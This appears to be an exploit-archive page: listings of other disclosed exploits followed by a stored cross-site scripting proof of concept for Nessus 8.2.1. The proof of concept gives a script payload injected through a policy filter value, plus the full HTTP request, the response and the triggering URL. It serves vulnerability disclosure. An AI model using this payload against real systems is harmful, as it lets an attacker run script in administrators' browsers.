Menu

"Nessus 8.2.1 - Cross-Site Scripting"

Author

"Ozer Goker"

Platform

multiple

Release date

2019-02-04

Release Date Title Type Platform Author
2019-02-11 "Indusoft Web Studio 8.1 SP2 - Remote Code Execution" remote multiple "Jacob Baines"
2019-02-06 "Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows" dos multiple "Google Security Research"
2019-02-04 "pfSense 2.4.4-p1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-04 "Nessus 8.2.1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-01-31 "macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics" dos multiple "Google Security Research"
2019-01-31 "macOS < 10.14.3 / iOS < 12.1.3 XNU - 'vm_map_copy' Optimization which Requires Atomicity isn't Atomic" dos multiple "Google Security Research"
2019-01-31 "macOS < 10.14.3 / iOS < 12.1.3 - Sandbox Escapes due to Type Confusions and Memory Safety Issues in iohideventsystem" dos multiple "Google Security Research"
2019-01-31 "macOS < 10.14.3 / iOS < 12.1.3 - Arbitrary mach Port Name Deallocation in XPC Services due to Invalid mach Message Parsing in _xpc_serializer_unpack" dos multiple "Google Security Research"
2019-01-30 "iOS/macOS 10.13.6 - 'if_ports_used_update_wakeuuid()' 16-byte Uninitialized Kernel Stack Disclosure" dos multiple "Google Security Research"
2019-01-28 "LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference" webapps multiple 0v3rride
2019-01-25 "iOS/macOS - 'task_swap_mach_voucher()' Use-After-Free" dos multiple "Google Security Research"
2019-01-25 "Lua 5.3.5 - 'debug.upvaluejoin' Use After Free" dos multiple "Fady Mohammed Osman"
2019-01-17 "Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting" webapps multiple "Mohamed M.Fouad"
2019-01-18 "SCP Client - Multiple Vulnerabilities (SSHtranger Things)" remote multiple "Mark E. Haase"
2019-01-16 "WebKit JSC JIT - GetIndexedPropertyStorage Use-After-Free" dos multiple "Google Security Research"
2019-01-16 "Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory in Invalid Array Length" dos multiple "Bogdan Kurinnoy"
2019-01-10 "OpenSource ERP 6.3.1. - SQL Injection" webapps multiple "Emre ÖVÜNÇ"
2017-03-02 "MDwiki < 0.6.2 - Cross-Site Scripting" webapps multiple evi1m0
2019-01-09 "Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory. Denial of Service (PoC)" dos multiple "Bogdan Kurinnoy"
2019-01-08 "Wireshark - 'get_t61_string' Heap Out-of-Bounds Read" dos multiple "Google Security Research"
2019-01-02 "WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write" dos multiple "Google Security Research"
2019-01-02 "WebKit JSC - 'AbstractValue::set' Use-After-Free" dos multiple "Google Security Research"
2018-12-10 "Kubernetes - (Authenticated) Arbitrary Requests" remote multiple evict
2018-12-10 "Kubernetes - (Unauthenticated) Arbitrary Requests" remote multiple evict
2018-12-21 "Netatalk - Bypass Authentication" remote multiple "Tenable NS"
2018-12-21 "Netatalk < 3.1.12 - Authentication Bypass" remote multiple "Jacob Baines"
2018-12-20 "Erlang - Port Mapper Daemon Cookie RCE (Metasploit)" remote multiple Metasploit
2018-12-15 "Google Chrome 70 - SQLite Magellan Crash (PoC)" dos multiple zhuowei
2018-12-19 "IBM Operational Decision Manager 8.x - XML External Entity Injection" webapps multiple "Mohamed M.Fouad"
2018-12-14 "Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)" webapps multiple alt3kx
2018-12-14 "Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure" webapps multiple alt3kx
2018-12-13 "WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains" dos multiple "Google Security Research"
2018-12-11 "Adobe ColdFusion 2018 - Arbitrary File Upload" webapps multiple "Vahagn Vardanyan"
2018-12-11 "Apache OFBiz 16.11.05 - Cross-Site Scripting" webapps multiple DKM
2018-12-11 "PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion" webapps multiple bzyo
2018-12-11 "XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection" local multiple "Google Security Research"
2018-12-04 "Wireshark - 'find_signature' Heap Out-of-Bounds Read" dos multiple "Google Security Research"
2018-12-04 "Wireshark - 'cdma2k_message_ACTIVE_SET_RECORD_FIELDS' Stack Corruption" dos multiple "Google Security Research"
2018-11-29 "TeamCity Agent - XML-RPC Command Execution (Metasploit)" remote multiple Metasploit
2018-11-29 "WebKit JSC - BytecodeGenerator::hoistSloppyModeFunctionIfNecessary Does not Invalidate the 'ForInContext' Object" dos multiple "Google Security Research"
2018-11-29 "WebKit JIT - 'ByteCodeParser::handleIntrinsicCall' Type Confusion" dos multiple "Google Security Research"
2018-11-29 "WebKit JSC JIT - 'JSPropertyNameEnumerator' Type Confusion" dos multiple "Google Security Research"
2018-11-26 "Xorg X11 Server - SUID privilege escalation (Metasploit)" local multiple Metasploit
2018-11-19 "ImageMagick - Memory Leak" local multiple barracud4_
2017-10-03 "Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting" local multiple "Anton Lopanitsyn"
2017-10-03 "Webkit (Safari) - Universal Cross-site Scripting" local multiple "Anton Lopanitsyn"
2014-11-21 "FluxBB < 1.5.6 - SQL Injection" webapps multiple secthrowaway
2018-08-13 "IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting" webapps multiple "Vikas Khanna"
2018-07-18 "Open-AudIT Community 2.1.1 - Cross-Site Scripting" webapps multiple "Ranjeet Jaiswal"
2018-07-11 "Dicoogle PACS 2.5.0 - Directory Traversal" webapps multiple "Carlos Avila"
2018-07-07 "Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution" webapps multiple bobsecq
2018-07-04 "Gitea 1.4.0 - Remote Code Execution" webapps multiple "Kacper Szurek"
2018-06-20 "IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit)" webapps multiple Nettitude
2018-05-25 "Oracle WebCenter Sites 11.1.1.8.0/12.2.1.x - Cross-Site Scripting" webapps multiple "Richard Alviarez"
2018-05-25 "SAP Internet Transaction Server 6200.x - Session Fixation / Cross-Site Scripting" webapps multiple "J. Carrillo Lencina"
2018-05-03 "JasperReports - (Authenticated) File Read" webapps multiple "Hector Monsegur"
2014-01-14 "Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection" webapps multiple "Takeshi Terada"
2018-04-18 "Kodi 17.6 - Persistent Cross-Site Scripting" webapps multiple "Manuel García Cárdenas"
2018-04-05 "WebRTC - Private IP Leakage (Metasploit)" webapps multiple "Dhiraj Mishra"
2018-03-30 "Open-AuditIT Professional 2.1 - Cross-Site Request Forgery" webapps multiple "Nilesh Sapariya"
2018-03-28 "TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting" webapps multiple "Sven Fassbender"
2018-03-28 "TwonkyMedia Server 7.0.11-8.5 - Directory Traversal" webapps multiple "Sven Fassbender"
2018-03-20 "Cisco node-jos < 0.11.0 - Re-sign Tokens" webapps multiple zioBlack
2018-03-06 "Bravo Tejari Web Portal - Cross-Site Request Forgery" webapps multiple "Arvind V"
2018-03-02 "antMan < 0.9.1a - Authentication Bypass" webapps multiple "Joshua Bowser"
2018-03-12 "Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials" webapps multiple LiquidWorm
2017-12-01 "MistServer 2.12 - Cross-Site Scripting" webapps multiple hyp3rlinx
2017-11-15 "CommuniGatePro 6.1.16 - Cross-Site Scripting" webapps multiple "Boumediene KADDOUR"
2017-11-03 "Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting" webapps multiple "Dewank Pant"
2017-11-03 "Logitech Media Server 7.9.0 - 'favorites' Cross-Site Scripting" webapps multiple "Dewank Pant"
2017-10-14 "Logitech Media Server - Cross-Site Scripting" webapps multiple "Thiago Sena"
2017-10-17 "OpenText Documentum Content Server - Arbitrary File Download" webapps multiple "Andrey B. Panfilov"
2017-10-17 "OpenText Documentum Content Server - 'dmr_content' Privilege Escalation" webapps multiple "Andrey B. Panfilov"
2017-10-17 "OpenText Documentum Content Server - Arbitrary File Download Privilege Escalation" webapps multiple "Andrey B. Panfilov"
2017-10-17 "OpenText Documentum Content Server - Privilege Escalation" webapps multiple "Andrey B. Panfilov"
2017-02-22 "Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation" webapps multiple forsec
2017-08-09 "Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery" webapps multiple "Dhiraj Mishra"
2017-09-04 "CodeMeter 6.50 - Cross-Site Scripting" webapps multiple Vulnerability-Lab
2017-07-25 "WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-07-18 "PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting" webapps multiple "Daniel Correa"
2017-07-07 "Apache Struts 2.3.x Showcase - Remote Code Execution" webapps multiple "Vex Woo"
2017-06-01 "WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-06-01 "WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-06-01 "WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-05-25 "Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-05-25 "WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation" webapps multiple "Google Security Research"
2017-05-25 "WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-05-25 "WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-05-25 "WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-05-25 "Apple WebKit / Safari 10.0.3(12602.4.8) - 'Editor::Command::execute' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-04-30 "Emby MediaServer 3.2.5 - Directory Traversal" webapps multiple LiquidWorm
2017-04-30 "Emby MediaServer 3.2.5 - Password Reset" webapps multiple LiquidWorm
2017-04-30 "Emby MediaServer 3.2.5 - SQL Injection" webapps multiple LiquidWorm
2017-04-25 "OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution" webapps multiple "Andrey B. Panfilov"
2017-04-25 "HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion" webapps multiple "Paolo Stagno"
2017-04-20 "Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-04-13 "agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting" webapps multiple "SySS GmbH"
2017-04-13 "agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery" webapps multiple "SySS GmbH"
2016-01-11 "SedSystems D3 Decimator - Multiple Vulnerabilities" webapps multiple prdelka
2017-04-11 "Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element" webapps multiple "Google Security Research"
2017-04-11 "Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-05-30 "KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution" webapps multiple SecuriTeam
2017-03-31 "Splunk Enterprise - Information Disclosure" webapps multiple hyp3rlinx
2017-04-20 "Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2016-05-04 "WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - File Upload (Metasploit)" webapps multiple Metasploit
2015-06-03 "SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)" webapps multiple Metasploit
2016-12-26 "PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)" webapps multiple Metasploit
2015-01-05 "OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit)" webapps multiple Metasploit
2015-01-25 "OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit)" webapps multiple Metasploit
2014-11-18 "Mantis Bug Tracker 1.2.0a3 < 1.2.17 XmlImportExport Plugin - PHP Code Injection (Metasploit) (1)" webapps multiple Metasploit
2018-02-16 "Oracle Primavera P6 Enterprise Project Portfolio Management - HTTP Response Splitting" webapps multiple "Marios Nicolaides"
2017-03-17 "Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution" webapps multiple SecuriTeam
2018-02-02 "Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal" webapps multiple "Dmitry Chastuhin"
2018-01-28 "Nexpose < 6.4.66 - Cross-Site Request Forgery" webapps multiple "Shwetabh Vishnoi"
2018-01-10 "SAP NetWeaver J2EE Engine 7.40 - SQL Injection" webapps multiple "Vahagn Vardanyan"
2003-06-16 "Snitz Forums 2000 < 3.4.0.3 - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2003-06-06 "Max Web Portal < 1.30 - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2003-06-04 "MegaBrowser < 0.71b - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2003-06-03 "FTP Service < 1.2 - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2003-06-02 "WinMX < 2.6 - Design Error" webapps multiple "GulfTech Security"
2003-05-30 "P-Synch < 6.2.5 - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2018-01-15 "DarkComet (C2 Server) - File Upload" webapps multiple "Pseudo Laboratories"
2003-01-17 "phpLinks < 2.1.2 - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2003-01-13 "PHP Topsites < 2.2 - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2018-01-03 "EMC xPression 4.5SP1 Patch 13 - 'model.jobHistoryId' SQL Injection" webapps multiple "Pawel Gocyla"
2017-12-27 "SAP BusinessObjects launch pad - Server-Side Request Forgery" webapps multiple "Ahmad Mahfouz"
2017-12-20 "Ability Mail Server 3.3.2 - Cross-Site Scripting" webapps multiple "Aloyce J. Makalanga"
2017-12-20 "Conarc iChannel - Improper Access Restrictions" webapps multiple "Information Paradox"
2017-12-13 "vBulletin 5 - 'cacheTemplates' Remote Arbitrary File Deletion" webapps multiple SecuriTeam
2017-12-13 "vBulletin 5 - 'routestring' Remote Code Execution" webapps multiple SecuriTeam
2017-03-15 "GitHub Enterprise < 2.8.7 - Remote Code Execution" webapps multiple orange
2017-03-08 "Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps multiple "SEC Consult"
2017-01-15 "Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)" webapps multiple "Mehmet Ince"
2017-02-24 "Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-02-24 "Apple WebKit 10.0.2 - Cross-Origin or Sandboxed IFRAME Pop-up Blocker Bypass" webapps multiple "Google Security Research"
2016-12-23 "Apache mod_session_crypto - Padding Oracle" webapps multiple "RedTeam Pentesting GmbH"
2016-08-04 "ntop-ng 2.5.160805 - Username Enumeration" webapps multiple "Dolev Farhi"
2016-12-09 "Splunk Enterprise 6.4.3 - Server-Side Request Forgery" webapps multiple Security-Assessment.com
2014-11-09 "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities" webapps multiple "Pedro Ribeiro"
2014-12-03 "ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download" webapps multiple "Pedro Ribeiro"
2015-02-09 "ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities" webapps multiple "Pedro Ribeiro"
2014-11-05 "ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)" webapps multiple "Pedro Ribeiro"
2015-01-15 "ManageEngine Desktop Central - Create Administrator" webapps multiple "Pedro Ribeiro"
2018-01-23 "NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download" webapps multiple LiquidWorm
2016-07-20 "Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps multiple LiquidWorm
2016-07-20 "Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)" webapps multiple LiquidWorm
2016-07-20 "Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation" webapps multiple LiquidWorm
2016-05-17 "Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)" webapps multiple "Karn Ganeshen"
2016-04-27 "EMC ViPR SRM - Cross-Site Request Forgery" webapps multiple "Han Sahin"
2016-03-23 "MiCollab 7.0 - SQL Injection" webapps multiple "Goran Tuzovic"
2016-03-28 "Liferay Portal 5.1.2 - Persistent Cross-Site Scripting" webapps multiple "Sarim Kiani"
2016-02-17 "JMX2 Email Tester - 'save_email.php' Arbitrary File Upload" webapps multiple HaHwul
2016-02-16 "ManageEngine Network Configuration Management Build 11000 - Privilege Escalation" webapps multiple "Kaustubh G. Padwad"
2016-02-16 "ManageEngine OPutils 8.0 - Multiple Vulnerabilities" webapps multiple "Kaustubh G. Padwad"
2016-02-10 "Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure" webapps multiple Vulnerability-Lab
2016-02-08 "dotDefender Firewall 5.00.12865/5.13-13282 - Cross-Site Request Forgery" webapps multiple hyp3rlinx
2016-02-02 "Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery" webapps multiple "Kaustubh G. Padwad"
2016-02-01 "ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation" webapps multiple GraphX
2016-01-28 "SAP HANA 1.00.095 - hdbindexserver Memory Corruption" webapps multiple ERPScan
2015-08-27 "Oracle GlassFish Server 4.1 - Directory Traversal" webapps multiple "Trustwave's SpiderLabs"
2014-08-20 "ManageEngine Password Manager Pro / ManageEngine IT360 - SQL Injection" webapps multiple "Pedro Ribeiro"
2016-01-14 "Manage Engine Application Manager 12.5 - Arbitrary Command Execution" webapps multiple "Bikramaditya Guha"
2016-01-14 "Manage Engine Applications Manager 12 - Multiple Vulnerabilities" webapps multiple "Bikramaditya Guha"
2015-12-01 "ntop-ng 2.0.151021 - Privilege Escalation" webapps multiple "Dolev Farhi"
2015-11-16 "VideoLAN VLC Media Player Web Interface 2.2.1 - Metadata Title Cross-Site Scripting" webapps multiple "Andrea Sindoni"
2015-11-05 "JSSE - SKIP-TLS" webapps multiple "Ramon de C Valle"
2015-11-05 "OpenSSL - Alternative Chains Certificate Forgery" webapps multiple "Ramon de C Valle"
2013-04-13 "Aibolit - Information Disclosure" webapps multiple MustLive
2015-10-08 "Kallithea 0.2.9 - 'came_from' HTTP Response Splitting" webapps multiple LiquidWorm
2013-02-06 "Verax NMS - Multiple Method Authentication Bypass" webapps multiple "Andrew Brooks"
2015-09-14 "ManageEngine OpManager 11.5 - Multiple Vulnerabilities" webapps multiple xistence
2015-09-14 "ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution" webapps multiple xistence
2012-11-26 "Forescout CounterACT - 'a' Open Redirection" webapps multiple "Joseph Sheridan"
2012-11-09 "ESRI ArcGIS for Server - 'where' SQL Injection" webapps multiple anonymous
2012-09-12 "Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting" webapps multiple "D. Niedermaier"
2015-08-13 "Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities" webapps multiple "Martino Sani"
2015-08-13 "Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection" webapps multiple "Dawid Golunski"
2015-08-12 "Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity" webapps multiple "David Bloom"
2015-07-27 "Hawkeye-G 3.0.1.4912 - Persistent Cross-Site Scripting / Information Leakage" webapps multiple hyp3rlinx
2015-07-24 "Hawkeye-G 3.0.1.4912 - Cross-Site Request Forgery" webapps multiple hyp3rlinx
2015-07-20 "AirDroid iOS / Android / Win 3.1.3 - Persistent" webapps multiple Vulnerability-Lab
2012-08-06 "Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities" webapps multiple "Benjamin Kunz Mejri"
2012-07-30 "Zenoss 3.2.1 - Multiple Vulnerabilities" webapps multiple "Brendan Coles"
2012-07-30 "Zenoss 3.2.1 - (Authenticated) Remote Command Execution" webapps multiple "Brendan Coles"
2012-08-03 "ntop - 'arbfile' Cross-Site Scripting" webapps multiple "Marcos Garcia"
2012-06-29 "SWFupload - 'movieName' Cross-Site Scripting" webapps multiple "Nathan Partlan"
2015-06-26 "Thycotic Secret Server 8.8.000004 - Persistent Cross-Site Scripting" webapps multiple "Marco Delai"
2015-08-18 "Cisco Unified Communications Manager - Multiple Vulnerabilities" webapps multiple "Bernhard Mueller"
2015-06-19 "Lively Cart - SQL Injection" webapps multiple "Manish Tanwar"
2015-06-19 "ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities" webapps multiple Vulnerability-Lab
2015-06-12 "Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities" webapps multiple "Dolev Farhi"
2015-05-18 "OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities" webapps multiple Vulnerability-Lab
2015-05-07 "WordPress Plugin Freshmail 1.5.8 - SQL Injection" webapps multiple "Felipe Molina"
2015-04-02 "Kemp Load Master 7.1.16 - Multiple Vulnerabilities" webapps multiple "Roberto Suggi Liverani"
2015-03-31 "JBoss AS 3/4/5/6 - Remote Command Execution" webapps multiple "João Filho Matos Figueiredo"
2015-03-17 "Metasploit Project < 4.11.1 - Initial User Creation Cross-Site Request Forgery (Metasploit)" webapps multiple "Mohamed Abdelbaset Elnoby"
2015-02-19 "CrushFTP 7.2.0 - Multiple Vulnerabilities" webapps multiple "Rehan Ahmed"
2011-07-12 "Flowplayer 3.2.7 - 'linkUrl' Cross-Site Scripting" webapps multiple "Szymon Gruszecki"
2015-01-26 "Symantec Data Center Security - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2015-01-26 "jclassifiedsmanager - Multiple Vulnerabilities" webapps multiple "Sarath Nair"
Release Date Title Type Platform Author
2019-02-12 "OPNsense < 19.1.1 - Cross-Site Scripting" webapps php "Ozer Goker"
2019-02-11 "IPFire 2.21 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-02-11 "Smoothwall Express 3.1-SP4 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-02-04 "pfSense 2.4.4-p1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-04 "Nessus 8.2.1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-01-07 "phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php "Ozer Goker"
2017-01-13 "Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution" webapps linux "Ozer Goker"
2016-04-21 "phpLiteAdmin 1.9.6 - Multiple Vulnerabilities" webapps php "Ozer Goker"
2016-04-14 "PHPmongoDB 1.0.0 - Multiple Vulnerabilities" webapps php "Ozer Goker"
2016-04-11 "RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities" webapps php "Ozer Goker"

Unfortunately we've not tracked down any possible victims.

Ads

##################################################################################################################################
# Exploit Title: Nessus 8.2.1 | Stored Cross-Site Scripting
# Date: 29.01.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.tenable.com
# Software Link: https://www.tenable.com/downloads/nessus
# Version: 8.2.1
##################################################################################################################################

Introduction
Nessus is #1 For Vulnerability Assessment

From the beginning, we've worked hand-in-hand with the security community. We continuously optimize Nessus based on community feedback to make it the most accurate and comprehensive vulnerability assessment solution in the market. 20 years later and we're still laser focused on community collaboration and product innovation to provide the most accurate and complete vulnerability data - so you don't miss critical issues which could put your organization at risk.


#################################################################################


XSS details: Stored

#################################################################################

XSS1 | Stored

URL
https://localhost:8834/policies

METHOD
Post

PARAMETER
value

PAYLOAD
\"><script>alert(1)</script>


Request

POST /policies HTTP/1.1
Host: localhost:8834
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost:8834/
Content-Type: application/json
X-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4
X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45
Content-Length: 3467
DNT: 1
Connection: close

{"uuid":"939a2145-95e3-0c3f-f1cc-761db860e4eed37b6eee77f9e101","dynamicPluginFilters":{"joinOperator":"and","filters":[{"filter":"cve","quality":"eq","value":"\"><script>alert(1)</script>"}]},"credentials":{"add":{},"edit":{},"delete":[]},"settings":{"patch_audit_over_rexec":"no","patch_audit_over_rsh":"no","patch_audit_over_telnet":"no","additional_snmp_port3":"161","additional_snmp_port2":"161","additional_snmp_port1":"161","snmp_port":"161","http_login_auth_regex_nocase":"no","http_login_auth_regex_on_headers":"no","http_login_invert_auth_regex":"no","http_login_max_redir":"0","http_reauth_delay":"","http_login_method":"POST","enable_admin_shares":"no","start_remote_registry":"no","dont_use_ntlmv1":"yes","never_send_win_creds_in_the_clear":"yes","attempt_least_privilege":"no","ssh_client_banner":"OpenSSH_5.0","ssh_port":"22","ssh_known_hosts":"","region_hkg_pref_name":"yes","region_syd_pref_name":"yes","region_lon_pref_name":"yes","region_iad_pref_name":"yes","region_ord_pref_name":"yes","region_dfw_pref_name":"yes","microsoft_azure_subscriptions_ids":"","aws_use_https":"yes","aws_verify_ssl":"yes","aws_ui_region_type":"Rest of the World","aws_sa_east_1":"","aws_ap_south_1":"","aws_ap_southeast_2":"","aws_ap_southeast_1":"","aws_ap_northeast_3":"","aws_ap_northeast_2":"","aws_ap_northeast_1":"","aws_eu_north_1":"","aws_eu_central_1":"","aws_eu_west_3":"","aws_eu_west_2":"","aws_eu_west_1":"","aws_ca_central_1":"","aws_us_west_2":"","aws_us_west_1":"","aws_us_east_2":"","aws_us_east_1":"","enable_plugin_list":"no","audit_trail":"full","enable_plugin_debugging":"no","log_whole_attack":"no","max_simult_tcp_sessions_per_scan":"","max_simult_tcp_sessions_per_host":"","max_hosts_per_scan":"30","max_checks_per_host":"5","network_receive_timeout":"5","reduce_connections_on_congestion":"no","slice_network_addresses":"no","stop_scan_on_disconnect":"no","safe_checks":"yes","display_unreachable_hosts":"no","log_live_hosts":"no","reverse_lookup":"no","allow_post_scan_editing":"yes","silent_dependencies":"yes","report_superseded_patches":"yes","report_verbosity":"Normal","scan_malware":"no","enum_local_users_end_uid":"1200","enum_local_users_start_uid":"1000","enum_domain_users_end_uid":"1200","enum_domain_users_start_uid":"1000","request_windows_domain_info":"yes","scan_webapps":"no","test_default_oracle_accounts":"no","provided_creds_only":"yes","smtp_to":"postmaster@[AUTO_REPLACED_IP]","smtp_from":"nobody@example.com","smtp_domain":"example.com","av_grace_period":"0","thorough_tests":"no","report_paranoia":"Normal","detect_ssl":"yes","check_crl":"no","enumerate_all_ciphers":"yes","cert_expiry_warning_days":"60","ssl_prob_ports":"Known SSL ports","svc_detection_on_all_ports":"yes","udp_scanner":"no","syn_scanner":"yes","syn_firewall_detection":"Automatic (normal)","verify_open_ports":"no","only_portscan_if_enum_failed":"yes","snmp_scanner":"yes","wmi_netstat_scanner":"yes","ssh_netstat_scanner":"yes","portscan_range":"default","unscanned_closed":"no","wol_wait_time":"5","wol_mac_addresses":"","scan_ot_devices":"no","scan_netware_hosts":"no","scan_network_printers":"no","ping_the_remote_host":"yes","udp_ping":"no","icmp_ping":"yes","icmp_ping_retries":"2","icmp_unreach_means_host_down":"no","tcp_ping":"yes","tcp_ping_dest_ports":"built-in","arp_ping":"yes","fast_network_discovery":"no","test_local_nessus_host":"yes","acls":[{"object_type":"policy","permissions":0,"type":"default"}],"description":"","name":"test"}}

Response

HTTP/1.1 200 OK
Cache-Control:
X-Frame-Options: DENY
Content-Type: application/json
Date: : Tue, 29 Jan 2019 12:44:04 GMT
Connection: close
Server: NessusWWW
X-Content-Type-Options: nosniff
Content-Length: 38
Expires: 0
Pragma:

{"policy_id":161,"policy_name":"test"}


PoC
URL
https://localhost:8834/#/scans/policies/161/config/dynamic-plugins